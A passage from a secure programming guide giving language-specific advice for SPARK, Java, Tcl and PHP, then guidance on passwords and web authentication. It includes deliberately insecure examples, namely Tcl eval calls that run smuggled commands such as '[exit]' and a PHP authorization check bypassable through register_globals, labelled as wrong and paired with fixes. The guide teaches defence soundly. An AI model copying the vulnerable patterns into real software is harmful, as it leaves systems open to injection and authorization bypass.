SPARK users use a tool called the ``SPARK Examiner'' to check
conformance to SPARK rules, including flow analysis, and there are
various supports for full formal proof of the code if desired.
<ulink url="http://www.sparkada.com">See the SPARK website for more
information</ulink>.
To my knowledge, there are no OSS/FS SPARK tools.
If you're storing passwords and private keys you should still
lock them into memory if appropriate
and overwrite them as soon as possible.
Note that SPARK is often used in environments where paging does not occur.
</para>
</sect1>

<sect1 id="java">
<title>Java</title>

<para>
<!-- Could mention "Core Java 2"; see http://www.amazon.com/
     exec/obidos/ASIN/0130819336/ref=sim_books/102-4729136-4374443 -->
<!-- ???: Add more information about creating your own domains inside
     a Java program.-->
If you're developing secure programs using Java,
frankly your first step (after learning Java)
is to read the two primary texts for Java security, namely
Gong [1999]
and
McGraw [1999] (for the latter, look particularly at section 7.1).
You should also look at Sun's posted security code guidelines at
<ulink url="http://java.sun.com/security/seccodeguide.html">http://java.sun.com/security/seccodeguide.html</ulink>, and
there's a nice
<ulink url="http://www-106.ibm.com/developerworks/java/library/j-staticsec.html?loc=dwmain">
article by Sahu et al [2002]</ulink>
A set of slides describing Java's security model are freely available at
<ulink url="http://www.dwheeler.com/javasec">http://www.dwheeler.com/javasec</ulink>.
You can also see McGraw [1998].
</para>

<para>
Obviously, a great deal depends on the kind of application you're developing.
Java code intended for use on the client side has a completely different
environment (and trust model) than code on a server side.
The general principles apply, of course; for example, you must
check and filter any input from an untrusted source.
However, in Java there are some ``hidden'' inputs or potential inputs that you
need to be wary of, as discussed below.
Johnathan Nightingale [2000] made an interesting statement
summarizing many of the issues in Java programming:
<blockquote>
<para>
... the big thing with Java programming is minding your inheritances.
If you inherit methods from parents, interfaces, or
parents' interfaces, you risk opening doors to your code.
</para>
</blockquote>
<!-- Secprog, Wed, 1 Nov 2000 18:46:43 -0500, Re: Secure Java programming -->
</para>

<para>
The following are a few key guidelines, based on Gong [1999],
McGraw [1999], Sun's guidance, and my own experience:

<orderedlist>

<listitem><para>
Do not use public fields or variables; declare them as private and
provide accessors to them so you can limit their accessibility.
</para></listitem>

<listitem><para>
Make methods private unless there is a good reason to do otherwise
(and if you do otherwise, document why).
These non-private methods must protect themselves, because they may
receive tainted data (unless you've somehow arranged to protect them).
</para></listitem>

<listitem><para>
The JVM may not actually enforce the accessibility modifiers
(e.g., ``private'') at run-time in an application
(as opposed to an applet).
My thanks to John Steven (Cigital Inc.), who pointed this out
on the ``Secure Programming'' mailing list on November 7, 2000.
The issue is that it all depends on what class loader
the class requesting the access was loaded with.
If the class was loaded with a trusted class loader (including the null/
primordial class loader),
the access check returns "TRUE" (allowing access).
For example, this works
(at least with Sun's 1.2.2 VM ; it might not work with
other implementations):
<orderedlist>
<listitem><para>write a victim class (V) with a public field, compile it.</para></listitem>
<listitem><para>write an 'attack' class (A) that accesses that field, compile it </para></listitem>
<listitem><para>change V's public field to private, recompile</para></listitem>
<listitem><para>run A - it'll access V's (now private) field.</para></listitem>
</orderedlist>
</para>
<para>
However, the situation is different with applets.
If you convert A to an applet and run it as an applet
(e.g., with appletviewer or browser), its class loader is no
longer a trusted (or null) class loader.
Thus, the code will throw
java.lang.IllegalAccessError, with the message that
you're trying to access a field V.secret from class A.
</para></listitem>
<!-- Source: SECPROG
Date:    Tue, 7 Nov 2000 16:52:47 -0500
From:    John Steven jsteven@CIGITAL.COM
Subject: Re: Java and 'private'

I looked into this w/ the Java 1.1 VM Spec., and the 1.2.2 VM source,
'spent only a short amount of time on it-mileage may vary.
-->

<listitem><para>
Avoid using static field variables. Such variables are attached to the
class (not class instances), and classes can be located by any other class.
As a result, static field variables can be found by any other class, making
them much more difficult to secure.
</para></listitem>

<listitem><para>
Never return a mutable object to potentially malicious code
(since the code may decide to change it).
Note that arrays are mutable (even if the array contents aren't),
so don't return a reference to an internal array with sensitive data.
</para></listitem>

<listitem><para>
Never store user given mutable objects (including arrays of objects)
directly.
Otherwise, the user could hand the object to the secure code, let the
secure code ``check'' the object, and change the data while the secure code
was trying to use the data.
Clone arrays before saving them internally, and be careful here
(e.g., beware of user-written cloning routines).
</para></listitem>

<listitem><para>
Don't depend on initialization.
There are several ways to allocate uninitialized objects.
</para></listitem>

<listitem><para>
Make everything final, unless there's a good reason not to.
If a class or method is non-final, an attacker could try to extend it
in a dangerous and unforeseen way.
Note that this causes a loss of extensibility, in exchange for security.
</para></listitem>

<listitem><para>
Don't depend on package scope for security.
A few classes, such as java.lang, are closed by default, and some
Java Virtual Machines (JVMs) let you close off other packages.
Otherwise, Java classes are not closed.
Thus, an attacker could introduce a new class inside your package,
and use this new class to access the things you thought you were protecting.
</para></listitem>

<listitem><para>
Don't use inner classes.
When inner classes are translated into byte codes, the inner class
is translated into a class accesible to any class in the package.
Even worse, the enclosing class's private fields silently
become non-private to permit access by the inner class!
</para></listitem>

<listitem><para>
Minimize privileges.
Where possible, don't require any special permissions at all.
McGraw goes further and recommends not signing any code; I say
go ahead and sign the code (so users can decide to ``run only
signed code by this list of senders''), but try to write the program
so that it needs nothing more than the sandbox set of privileges.
If you must have more privileges, audit that code especially hard.
</para></listitem>

<listitem><para>
If you must sign your code, put it all in one archive file.
Here it's best to quote McGraw [1999]:
<blockquote>
<para>
The goal of this rule is to prevent
an attacker from carrying out a mix-and-match
attack in which the attacker constructs a new applet
or library that links some of your signed classes together
with malicious classes, or links together signed classes that you
never meant to be used together.
By signing a group of classes together, you make this attack more difficult.
Existing code-signing systems do an inadequate job of
preventing mix-and-match attacks, so this rule cannot
prevent such attacks completely. But using a single archive can't hurt.
</para>
</blockquote>
</para></listitem>

<listitem><para>
Make your classes uncloneable.
Java's object-cloning mechanism allows an attacker to
instantiate a class without running any of its constructors.
To make your class uncloneable, just define the following method
in each of your classes:
<!-- Originally this said void, not Object; I'm told Object is correct.  -->
<programlisting width="71">
<![CDATA[
public final Object clone() throws java.lang.CloneNotSupportedException {
   throw new java.lang.CloneNotSupportedException();
   }
]]>
</programlisting>
</para>
<para>
If you really need to make your class cloneable, then there are some
protective measures you can take to prevent attackers from redefining
your clone method.
If you're defining your own clone method, just make it final.
If you're not, you can at least prevent the clone method from
being maliciously overridden by adding the following:
<programlisting width="71">
<![CDATA[
public final void clone() throws java.lang.CloneNotSupportedException {
  super.clone();
  }
]]>
</programlisting>
</para></listitem>

<listitem><para>
Make your classes unserializeable.
Serialization allows attackers to view the internal state of your objects,
even private portions.
To prevent this, add this method to your classes:
<programlisting width="66">
<![CDATA[
private final void writeObject(ObjectOutputStream out)
  throws java.io.IOException {
     throw new java.io.IOException("Object cannot be serialized");
  }
]]>
</programlisting>
</para>
<para>
Even in cases where serialization is okay, be sure to use
the transient keyword for the fields
that contain direct handles to system resources and
that contain information relative to an address space.
Otherwise, deserializing the class may permit improper access.
You may also want to identify sensitive information as transient.
</para>

<para>
If you define your own serializing method for a class,
it should not pass an internal array to any DataInput/DataOuput
method that takes an array.
The rationale: All DataInput/DataOutput methods can be overridden.
If a Serializable class passes a private array directly to a DataOutput(write(byte [] b)) method, then an attacker
could subclass ObjectOutputStream and override the write(byte [] b)
method to enable him to access and modify the private array.
Note that the default serialization does not expose private
byte array fields to DataInput/DataOutput byte array methods.
</para></listitem>

<listitem><para>
Make your classes undeserializeable.
Even if your class is not serializeable, it may still be deserializeable.
An attacker can create a sequence of bytes that happens
to deserialize to an instance of your class with values of the
attacker's choosing.
In other words, deserialization is a kind of public constructor, allowing
an attacker to choose the object's state - clearly a dangerous operation!
To prevent this, add this method to your classes:
<programlisting width="66">
<![CDATA[
private final void readObject(ObjectInputStream in)
  throws java.io.IOException {
    throw new java.io.IOException("Class cannot be deserialized");
  }
]]>
</programlisting>
</para></listitem>

<listitem><para>
Don't compare classes by name.
After all, attackers can define classes with identical names, and if
you're not careful you can cause confusion by granting these classes
undesirable privileges.
Thus, here's an example of the <emphasis>wrong</emphasis> way
to determine if an object has a given class:
<programlisting width="65">
<![CDATA[
  if (obj.getClass().getName().equals("Foo")) {
]]>
</programlisting>
</para>
<para>
If you need to determine if two objects have exactly the
same class, instead
use getClass() on both sides and compare using the == operator,
Thus, you should use this form:
<programlisting width="65">
<![CDATA[
  if (a.getClass() == b.getClass()) {
]]>
</programlisting>
If you truly need to determine if an object has a given classname, you
need to be pedantic and be sure to use the current namespace
(of the current class's ClassLoader).
Thus, you'll need to use this format:
<programlisting width="65">
<![CDATA[
  if (obj.getClass() == this.getClassLoader().loadClass("Foo")) {
]]>
</programlisting>
</para>
<para>
This guideline is from McGraw and Felten, and it's a good guideline.
I'll add that, where possible, it's often a good idea to avoid comparing
class values anyway.
It's often better to try to design class methods and interfaces so you
don't need to do this at all.
However, this isn't always practical, so it's important to know these tricks.
</para></listitem>

<listitem><para>
Don't store secrets (cryptographic keys, passwords, or
algorithm) in the code or data.
Hostile JVMs can quickly view this data.
Code obfuscation doesn't really hide the code from serious attackers.
</para></listitem>

</orderedlist>

</para>

</sect1>

<sect1 id="tcl">
<title>Tcl</title>
<para>
Tcl stands for ``tool command language'' and is pronounced ``tickle.''
Tcl is divided into two parts: a language and a library.
The language is a simple language, originally intended for issuing commands
to interactive programs and including basic programming capabilities.
The library can be embedded in application programs.
You can find more information about Tcl at sites such as the
<ulink url="http://www.tcl.tk/">Tcl.tk</ulink> and the
<ulink url="http://www.sco.com/Technology/tcl/Tcl.html">Tcl WWW Info</ulink>
web page and the comp.lang.tcl FAQ launch page at
<ulink url="http://www.tclfaq.wservice.com/tcl-faq">http://www.tclfaq.wservice.com/tcl-faq</ulink>.
My thanks go to Wojciech Kocjan for providing some of this detailed
information on using Tcl in secure applications.
</para>

<para>
For some security applications, especially interesting components of Tcl
are Safe-Tcl (which creates a sandbox in Tcl)
and Safe-TK (which implements a sandboxed portable GUI for Safe Tcl), as
well as the WebWiseTclTk Toolkit which permits Tcl packages to be automatically
located and loaded from anywhere on the World Wide Web.
You can find more about the latter from
<ulink url="http://www.cbl.ncsu.edu/software/WebWiseTclTk">http://www.cbl.ncsu.edu/software/WebWiseTclTk</ulink>.
It's not clear to me how much code review this has received.
</para>

<para>
Tcl's original design goal to be a small, simple
language resulted in a language that was originally somewhat limiting
and slow.
For an example of the limiting weaknesses in the original language, see
<ulink url="http://sdg.lcs.mit.edu/~jchapin/6853-FT97/Papers/stallman-tcl.html">
Richard Stallman's ``Why You Should Not Use Tcl''</ulink>.
For example, Tcl was originally designed to really support only
one data type (string).
Thankfully, these issues have been addressed over time.
In particular, version 8.0 added support for more data types
(integers are stored internally as integers, lists as lists and so on).
This improves its capabilities, and in particular improves its speed.
</para>

<para>
As with essentially all scripting languages,
Tcl has an "eval" command that parses and executes arbitrary Tcl commands.
And like all such scripting languages, this eval command needs to be
used especially carefully, or an attacker could insert
characters in the input to cause malicious things to occur.
For example, an attackers may be able insert characters
with special meaning to Tcl
such as embedded whitespace (including space and newline),
double-quote, curly braces, square brackets,
dollar signs, backslash, semicolon, or pound sign (or create input
to cause these characters to be created during processing).
This also applies to any function that passes data to eval as well
(depending on how eval is called).
</para>

<para>
Here is a small example that may make this concept clearer;
first, let's define a small function and then interactively invoke it
directly - note that these uses are fine:
<programlisting width="65">
<![CDATA[
 proc something {a b c d e} {
       puts "A='$a'"
       puts "B='$b'"
       puts "C='$c'"
       puts "D='$d'"
       puts "E='$e'"
 }

 % # This works normally:
 % something "test 1" "test2" "t3" "t4" "t5"
 A='test 1'
 B='test2'
 C='t3'
 D='t4'
 E='t5'

 % # Imagine that str1 is set by an attacker:
 % set str1 {test 1 [puts HELLOWORLD]}

 % # This works as well
 % something $str1 t2 t3 t4 t5
 A='test 1 [puts HELLOWORLD]'
 B='t2'
 C='t3'
 D='t4'
 E='t5'
]]>
</programlisting>

However, continuing the example, let's see how "eval"
can be incorrectly and correctly called.
If you call eval in an incorrect (dangerous) way, it
allows attackers to misuse it.
However, by using commands like list or lrange to correctly
group the input, you can avoid this problem:

<programlisting width="65">
<![CDATA[
 % # This is the WRONG way - str1 is interpreted.
 % eval something $str1 t2 t3
 HELLOWORLD
 A='test'
 B='1'
 C=''
 D='t2'
 E='t3'

 % # Here's one solution, using "list".
 % eval something [list $str1 t2 t3 t4 t5]
 A='test 1 [puts HELLOWORLD]'
 B='t2'
 C='t3'
 D='t4'
 E='t5'

 % # Here's another solution, using lrange:
 % eval something [lrange $str1 0 end] t2
 A='test'
 B='1'
 C='[puts'
 D='HELLOWORLD]'
 E='t2'
]]>
</programlisting>
Using lrange is useful when concatenating arguments to a called
function, e.g., with more complex libraries using callbacks.
In Tcl, eval is often used to create a one-argument version of a function
that takes a variable number of arguments, and you need to be careful
when using it this way.
Here's another example (presuming that you've defined a "printf" function):
<programlisting width="65">
<![CDATA[
 proc vprintf {str arglist} {
      eval printf [list $str] [lrange $arglist 0 end]
 }

 % printf "1+1=%d  2+2=%d" 2 4
 % vprintf "1+1=%d  2+2=%d" {2 4}
]]>
</programlisting>
</para>

<para>
Fundamentally, when passing a command that will be eventually
evaluated, you must pass Tcl commands as a properly built list,
and not as a (possibly concatentated) string.
For example, the "after" command runs a Tcl command after a given
number of milliseconds; if the data in $param1 can be controlled by
an attacker, this Tcl code is dangerously wrong:
<programlisting width="65">
<![CDATA[
  # DON'T DO THIS if param1 can be controlled by an attacker
  after 1000 "someCommand someparam $param1"
]]>
</programlisting>
This is wrong, because if an attacker can control the value of $param1,
the attacker can control the program.
For example, if the attacker can cause $param1 to have
'[exit]', then the program will exit.
Also, if $param1 would be '; exit', it would also exit.
</para>

<para>
Thus, the proper alternative would be:
<programlisting width="65">
<![CDATA[
 after 1000 [list someCommand someparam $param1]
]]>
</programlisting>
Even better would be something like the following:
<programlisting width="65">
<![CDATA[
 set cmd [list someCommand someparam]
 after 1000 [concat $cmd $param1]
]]>
</programlisting>
</para>

<para>
Here's another example showing what you shouldn't do,
pretending that $params is data controlled by possibly malicious user:
<programlisting width="65">
<![CDATA[
 set params "%-20s TESTSTRING"
 puts "'[eval format $params]'"
]]>
</programlisting>
will result in:
<programlisting width="65">
<![CDATA[
 'TESTSTRING       '
]]>
</programlisting>
But, when if the untrusted user sends data with an embedded newline,
like this:
<programlisting width="65">
<![CDATA[
 set params "%-20s TESTSTRING\nputs HELLOWORLD"
 puts "'[eval format $params]'"
]]>
</programlisting>
The result will be this (notice that the attacker's code was executed!):
<programlisting width="65">
<![CDATA[
 HELLOWORLD
 'TESTINGSTRING       '
]]>
</programlisting>
Wojciech Kocjan suggests that the
simplest solution in this case is to convert this to a list using
lrange, doing this:
<programlisting width="65">
<![CDATA[
 set params "%-20s TESTINGSTRING\nputs HELLOWORLD"
 puts "'[eval format [lrange $params 0 end]]'"
]]>
</programlisting>
The result would be:
<programlisting width="65">
<![CDATA[
 'TESTINGSTRING       '
]]>
</programlisting>
Note that this solution presumes that the potentially malicious
text is concatenated to the end of the text; as with all languages,
make sure the attacker cannot control the format text.
</para>

<para>
As a matter of style always use curly braces
when using if, while, for, expr, and any other command which
parses an argument using expr/eval/subst.
Doing this will avoid
a common error when using Tcl called unintended double substitution
(aka double substitution).
This is best explained by example; the following code is incorrect:
<programlisting width="65">
<![CDATA[
 while ![eof $file] {
     set line [gets $file]
 }
]]>
</programlisting>
The code is incorrect because the "![eof $file]" text will be evaluated
by the Tcl parser when the while command is executed the first time,
and not re-evaluated in every iteration as it should be.
Instead, do this:
<programlisting width="65">
<![CDATA[
 while {![eof $file]} {
      set line [gets $file]
 }
]]>
</programlisting>
Note that both the condition, and the action to be performed,
are surrounded by curly braces.
Although there are cases where the braces are redundant, they never hurt,
and when you fail to include the curly braces where they're needed
(say, when making a minor change) subtle and hard-to-find
errors often result.
</para>

<para>
More information on good Tcl style can be found in documents such as
<ulink url="http://www.tcl.tk/doc/styleGuide.pdf">
Ray Johnson's Tcl Style Guide</ulink>.
</para>

<para>
In the past, I have stated that
I don't recommend Tcl for writing programs which must
mediate a security boundary.
Tcl seems to have improved since that time, so while I cannot guarantee
Tcl will work for your needs, I can't guarantee that any other language
will work for you either.
Again, my thanks to Wojciech Kocjan who provided some
of these suggestions on how to
write Tcl code for secure applications.
</para>
</sect1>

<sect1 id="PHP">
<title>PHP</title>

<para>
SecureReality has put out a very interesting paper titled
``A Study In Scarlet - Exploiting Common Vulnerabilities in PHP''
[Clowes 2001],
which discusses some of the problems in writing secure programs in PHP,
particularly in versions before PHP 4.1.0.
Clowes concludes that
``it is very hard to write a secure PHP application (in the
default configuration of PHP), even if you try''.
</para>

<para>
Granted, there are security issues in any language, but one
particular issue stands out in older versions of PHP that arguably makes
older PHP versions
less secure than most languages: the way it loads data into its namespace.
By default, in PHP (versions 4.1.0 and lower)
all environment variables and values sent to PHP over the web
are automatically loaded into the same namespace (global variables)
that normal variables are loaded into - so attackers can set arbitrary
variables to arbitrary values, which keep their values unless explicitly
reset by a PHP program.
In addition, PHP automatically creates variables with a
default value when they're first requested, so
it's common for PHP programs to not initialize variables.
If you forget to set a variable, PHP can report it, but
by default PHP won't - and note that this simply an error report, it
won't stop an attacker who finds an unusual way to cause it.
Thus, by default PHP allows an attacker to
completely control the values of all variables in a program unless
the program takes special care to override the attacker.
Once the program takes over, it can reset these variables,
but failing to reset
any variable (even one not obvious) might open a vulnerability in the
PHP program.
</para>

<para>
For example, the following PHP program (an example from Clowes)
intends to only let those who
know the password to get some important information, but an attacker
can set ``auth'' in their web browser and subvert the authorization check:
<programlisting width="65">
<![CDATA[
 <?php
  if ($pass == "hello")
   $auth = 1;
  ...
  if ($auth == 1)
   echo "some important information";
 ?>
]]>
</programlisting>
</para>

<para>
I and many others have complained about this particularly
dangerous problem; it's particularly a problem because
PHP is widely used.
A language that's supposed to be easy to use better make
it easy to write secure programs in, after all.
It's possible to disable this misfeature in PHP by turning the setting
``register_globals'' to ``off'', but by default PHP versions up through 4.1.0
default set this to ``on'' and PHP before 4.1.0 is harder
to use with register_globals off.
The PHP developers warned in their PHP 4.1.0 announcenment that
``as of the next semi-major version of PHP, new installations of PHP will
default to having register_globals set to off.''
This has now happened; as of PHP version 4.2.0, External
variables (from the environment, the HTTP request, cookies or the web
server) are no longer registered in the global scope by default. The
preferred method of accessing these external variables is by using the new
Superglobal arrays, introduced in PHP 4.1.0.
<!--
http://linuxtoday.com/news_story.php3?ltsn=2002-04-23-016-26-NW-DV
-->
</para>

<para>
PHP with ``register_globals'' set to ``on'' is a dangerous choice
for nontrivial programs - it's just too easy to write insecure programs.
However, once ``register_globals'' is set to ``off'', PHP is quite
a reasonable language for development.
</para>


<para>
The secure default should include setting
``register_globals'' to ``off'', and also including several functions to
make it much easier for users to specify and limit the input they'll
accept from external sources.
Then web servers (such as Apache) could separately configure this
secure PHP installation.
Routines could be placed in the PHP library to make it
easy for users to list the input variables they want to accept;
some functions could check the patterns these variables must have
and/or the type that the variable must be coerced to.
In my opinion, PHP is a bad choice for secure web development
if you set register_globals on.
</para>

<para>
As I suggested in earlier versions of this book,
PHP has been trivially modified to become a reasonable choice
for secure web development.
However, note that PHP doesn't have a particularly good
security vulnerability track record
(e.g., register_globals, a file upload problem, and a format
string problem in the error reporting library);
I believe that security issues were not considered sufficiently in
early editions of PHP;
I also think that the PHP developers are now emphasizing security
and that these security issues are finally getting worked out.
One evidence is the major change that the PHP developers have made to
get turn off register_globals; this had a significant impact on
PHP users, and their willingness to make this change is a good sign.
Unfortunately, it's not yet clear how secure PHP really is;
PHP just hasn't had much of a track record now that the developers
of PHP are examining it seriously for security issues.
Hopefully this will become clear quickly.
</para>

<para>
If you've decided to use PHP, here are some of my recommendations
(many of these recommendations are based on ways to counter
the issues that Clowes raises):
<itemizedlist>
<listitem><para>
Set the PHP configuration option
``register_globals'' off, and use PHP 4.2.0 or greater.
PHP 4.1.0 adds several special arrays, particularly $_REQUEST,
which makes it far simpler to develop software in PHP
when ``register_globals'' is off.
Setting register_globals off, which is the default in PHP 4.2.0,
completely eliminates the most common PHP attacks.
If you're assuming that register_globals is off, you should check for
this first (and halt if it's not true) - that way, people who install
your program will quickly know there's a problem.
Note that many third-party PHP applications cannot
work with this setting, so it can be difficult to
keep it off for an entire website.
It's possible to set register_globals off for only some programs.
For example, for Apache, you could insert these lines into the file .htaccess
in the PHP directory (or use Directory directives to control it further):
<programlisting>
 php_flag register_globals Off
 php_flag track_vars On
</programlisting>
However, the .htaccess file itself is ignored unless the Apache web server
is configured to permit overrides; often the Apache global configuration
is set so that AllowOverride is set to None.
So, for Apache users,
if you can convince your web hosting service to set ``AllowOverride Options''
in their configuration file (often /etc/http/conf/http.conf) for your
host, do that.
Then write helper functions to simplify loading the data you need
(and only that data).
</para></listitem>

<listitem><para>
If you must develop software where register_globals might be on while
running (e.g., a widely-deployed PHP application),
always set values not provided by the user.
Don't depend on PHP
default values, and don't trust any variable you haven't explicitly set.
Note that you have to do this for <emphasis>every</emphasis> entry point
(e.g., every PHP program or HTML file using PHP).
The best approach is to begin each PHP program by setting all variables
you'll be using, even if you're simply resetting them to the
usual default values (like "" or 0).
This includes global variables referenced in included files,
even all libraries, transitively.
Unfortunately, this makes this recommendation hard to do, because few
developers truly know and understand all global variables that may be used
by all functions they call.
One lesser alternative is to search through HTTP_GET_VARS, HTTP_POST_VARS,
HTTP_COOKIE_VARS, and HTTP_POST_FILES to see if the user provided the data -
but programmers often forget to check all sources, and what happens if
PHP adds a new data source
(e.g., HTTP_POST_FILES wasn't in old versions of PHP).
Of course, this simply tells you how to make the best of a bad
situation; in case you haven't noticed yet, turn off
register_globals!
</para></listitem>

<listitem><para>
Set the error reporting level to E_ALL, and resolve all errors reported
by it during testing.
Among other things, this will complain about un-initialized variables,
which are a key issues in PHP.
This is a good idea anyway whenever you start using PHP, because
this helps debug programs, too.
There are many ways to set the error reporting level, including in the
``php.ini'' file (global), the ``.htttpd.conf'' file (single-host),
the ``.htaccess'' file (multi-host), or at the top of the script
through the error_reporting function.
I recommend setting the error reporting level in both the php.ini file
and also at the top of the script; that way, you're protected if
(1) you forget to insert the command at the top of the script, or (2) move the
program to another machine and forget to change the php.ini file.
Thus, every PHP program should begin like this:
<programlisting width="66">
  &lt;?php error_reporting(E_ALL);?&gt;
</programlisting>
It could be argued that this error reporting should be turned on
during development, but turned off when actually run on a real site
(since such error message could give useful information to an attacker).
The problem is that if they're disabled during ``actual use'' it's all
too easy to leave them disabled during development.
So for the moment, I suggest the simple approach of simply including it
in every entrance.
A much better approach is to record all errors, but direct the error reports
so they're only included in a log file
(instead of having them reported to the attacker).
</para></listitem>

<listitem><para>
Filter any user information used to create filenames carefully, in
particular to prevent remote file access.
PHP by default comes with ``remote files'' functionality -- that means
that file-opening commands like fopen(), that in other languages can
only open local files, can actually be used to invoke web or ftp
requests from another site.
</para></listitem>

<listitem><para>
Do not use old-style PHP file uploads; use the HTTP_POST_FILES array
and related functions.
PHP supports file uploads by uploading the file to some
temporary directory with a special filename.
PHP originally set a collection of variables to indicate where that filename
was, but since an attacker can control variable names and their values,
attackers could use that ability to cause great mischief.
Instead, always use HTTP_POST_FILES and related functions to access
uploaded files.
Note that even in this case, PHP's approach permits attackers to
temporarily upload files to you with arbitrary content, which is
risky by itself.
</para></listitem>

<listitem><para>
Only place protected entry points in the document tree; place all
other code (which should be most of it) outside the document tree.
PHP has a history of unfortunate advice on this topic.
Originally, PHP users were supposed to use the ``.inc'' (include)
extension for ``included'' files, but these included files often had
passwords and other information, and Apache would just give requesters
the contents of the ``.inc'' files when asked to do so when they
were in the document tree.
Then developers gave all files a ``.php'' extension - which meant that the
contents weren't seen, but now files never meant to be entry points
became entry points and were sometimes exploitable.
As mentioned earlier, the usual security advice is the best:
place only the proected entry points (files) in the document tree, and
place other code (e.g., libraries) outside the document tree.
There shouldn't be any ``.inc'' files in the document tree at all.
</para></listitem>

<listitem><para>
Avoid the session mechanism.
The ``session'' mechanism is handy for storing persistent data, but
its current implementation has many problems.
First, by default sessions store information in temporary files - so
if you're on a multi-hosted system, you open yourself up to many attacks and
revelations.
Even those who aren't currently multi-hosted may find themselves
multi-hosted later!
You can "tie" this information into a database instead of the filesystem,
but if others on a multi-hosted database can access that database with the
same permissions, the problem is the same.
There are also ambiguities if you're not careful
(``is this the session value or an attacker's value''?)
and this is another case where an attacker can force a file or
key to reside
on the server with content of their choosing - a dangerous situation -
and the attacker can even control to some extent the name of the file or key
where this data will be placed.
</para></listitem>

<listitem><para>
For all inputs, check that they match a pattern for acceptability
(as with any language), and then use type casting to coerce non-string data
into the type it should have.
Develop ``helper'' functions to easily check and import a selected list
of (expected) inputs.
PHP is loosely typed, and this can cause trouble.
For example, if an input datum has the value "000", it won't be equal to "0"
nor is it empty().
This is particularly important for associative arrays, because their
indexes are strings; this means that $data["000"]
is different than $data["0"].
For example, to make sure $bar has type double (after making sure it
only has the format legal for a double):
<programlisting width="66">
  $bar = (double) $bar;
</programlisting>
</para></listitem>
<listitem><para>
Be especially careful of risky functions.
This includes those that perform PHP code execution
(e.g., require(), include(), eval(), preg_replace()),
command execution
(e.g., exec(), passthru(), the backtick operator, system(), and popen()),
and open files
(e.g., fopen(), readfile(), and file()).
This is not an exhaustive list!
</para></listitem>
<listitem><para>
Use magic_quotes_gpc() where appropriate - this eliminates many kinds of
attacks.
</para></listitem>
<listitem><para>
Avoid file uploads, and consider modifying the php.ini file to
disable them (file_uploads = Off).
File uploads have had security holes in the past, so on older PHP's this
is a necessity, and until more experience shows that they're safe this
isn't a bad thing to remove.
Remember, in general, to secure a system you should disable or remove
anything you don't need.
<!--
http://lwn.net/2002/0307/a/php-upload.php3
-->
</para></listitem>
</itemizedlist>
</para>


</sect1>

</chapter>

<chapter id="special">
<title>Special Topics</title>

<epigraph>
<attribution>Proverbs 16:22 (NIV)</attribution>
<para>
Understanding is a fountain of life to those who have it,
but folly brings punishment to fools.
</para>
</epigraph>

<sect1 id="passwords">
<title>Passwords</title>

<para>
Where possible, don't write code to handle passwords.
In particular, if the application is local,
try to depend on the normal login authentication by a user.
If the application is a CGI script, try to depend on the web server to provide
the protection as much as possible -
but see below about handling authentication in a web server.
If the application is over a network, avoid sending the password as cleartext
(where possible) since it can
be easily captured by network sniffers and reused later.
``Encrypting'' a password using some key fixed in the algorithm or using
some sort of shrouding algorithm is essentially the same as sending the
password as cleartext.
</para>

<!-- ???: Show _HOW_ to use PAM to do simple password checking; the PAM
     docs are complex on this score.  Also show how to ``fall through''
     if you don't have PAM? -->

<para>
For networks, consider at least using digest passwords.
Digest passwords are passwords developed from hashes; typically the
server will send the client some data (e.g., date, time, name of server),
the client combines this data with the user password, the client hashes
this value (termed the ``digest pasword'')
and replies just the hashed result to the server;
the server verifies this hash value.
This works, because the password is never actually sent in any form; the
password is just used to derive the hash value.
Digest passwords aren't considered ``encryption'' in
the usual sense and are usually accepted even in countries with laws
constraining encryption for confidentiality.
Digest passwords are vulnerable to active attack threats but
protect against passive network sniffers.
One weakness is that, for digest passwords
to work, the server must have all the unhashed passwords, making the server
a very tempting target for attack.
</para>

<para>
If your application permits users to set their passwords, check
the passwords and permit only ``good'' passwords
(e.g., not in a dictionary, having certain minimal length, etc.).
You may want to look at information such as
<ulink
url="http://consult.cern.ch/writeup/security/security_3.html">http://consult.cern.ch/writeup/security/security_3.html</ulink>
on how to choose a good password.
You should use PAM if you can, because it supports pluggable password checkers.
</para>
</sect1>

<sect1 id="web-authentication">
<title>Authenticating on the Web</title>
<para>
On the web, a web server is usually authenticated to users by using SSL or TLS
and a server certificate - but it's not as easy to authenticate who
the users are.
SSL and TLS do support client-side certificates, but there are many practical
problems with actually using them (e.g., web browsers don't support a single
user certificate format and users find it difficult to install them).
You can learn about how to set up digital certificates from many places, e.g.,
<ulink url="http://www.petbrain.com/modules.php?op=modload&amp;name=pki&amp;file=index">Petbrain</ulink>.
Using Java or Javascript has its own problems, since many users disable them,
some firewalls filter them out, and they tend to be slow.
In most cases, requiring every user to install a plug-in is impractical too,
though if the system is only for an intranet for a relatively
small number of users this may be appropriate.
</para>

<para>
If you're building an intranet application, you should generally use
whatever authentication system is used by your users.
Unix-like systems tend to use Kerberos, NIS+, or LDAP.
You may also need to deal with a Windows-based authentication schemes
(which can be viewed as proprietary variants of Kerberos and LDAP).
Thus, if your organization depend on Kerberos,
design your system to use Kerberos.
Try to separate the authentication system from the rest of your application,
since the organization may (will!) change their authentication system over
time.
</para>

<para>
Many techniques don't work or don't work very well.
One approach that works in some cases
is to use ``basic authentication'', which is built into
essentially all browsers and servers.
Unfortunately, basic authentication sends passwords unencrypted, so it
makes passwords easy to steal; basic authentication by itself is really
useful only for worthless information.
You could store authentication information in the URLs selected by the users,
but for most circumstances you should never do this - not only are
the URLs sent unprotected over the wire (as with basic authentication),
but there are too many other ways that
this information can leak to others
(e.g., through the browser history logs stored by many browsers,
logs of proxies, and to other web sites through the Referer: field).
You could wrap all communication with a web server using
an SSL/TLS connection (which would encrypt it); this is secure
(depending on how you do it), and it's
necessary if you have important data, but note that
this is costly in terms of performance.
You could also use ``digest authentication'', which exposes the communication
but at least authenticates the user without exposing the
underlying password used to authenticate the user.
Digest authentication is intended to be a simple partial solution for
low-value communications,
but digest authentication
is not widely supported in an interoperable way by web browsers and servers.
In fact, as noted in a March 18, 2002 eWeek article,
Microsoft's web client (Internet Explorer) and web server (IIS)
incorrectly implement the standard  (RFC 2617), and thus won't work with
other servers or browsers. Since Microsoft
don't view this incorrect implementation as a serious
problem, it will be a very long time before most of their customers have
a correctly-working program.
<!-- http://www.eweek.com/article/0,3658,s=702&a=24177,00.asp -->
</para>

<para>
Thus, the most common technique for authenticating on the web today is
through cookies.
Cookies weren't really designed for this purpose, but they can be used
for authentication - but there are many wrong ways to use them that
create security vulnerabilities, so be careful.
For more information about cookies, see IETF RFC 2965, along with the
older specifications about them.
Note that to use cookies, some browsers (e.g., Microsoft
Internet Explorer 6) may insist that you
have a privacy profile (named p3p.xml on the root directory of the server).
